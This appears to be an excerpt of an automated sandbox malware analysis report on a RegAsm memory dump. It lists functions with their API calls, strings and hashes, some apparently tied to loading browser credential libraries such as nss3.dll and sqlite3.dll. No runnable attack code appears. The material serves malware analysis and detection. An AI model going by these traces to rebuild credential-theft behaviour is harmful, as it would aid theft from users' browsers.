                                                                                                                                                                                Strings
                                                                                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                                                                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                                                • API String ID: 3334749609-1948609170
                                                                                                                                                                                • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                                                • API String ID: 1983510840-1155512374
                                                                                                                                                                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                Function 00410D0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                • API String ID: 1029625771-543337301
                                                                                                                                                                                • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                                • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                                Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                                                                • String ID: A4@$Server Details
                                                                                                                                                                                • API String ID: 1096422788-4071850762
                                                                                                                                                                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3110682361-0
                                                                                                                                                                                • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                                • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                • free.MSVCRT ref: 0040799A
                                                                                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                • free.MSVCRT ref: 004079BD
                                                                                                                                                                                • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                                                • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59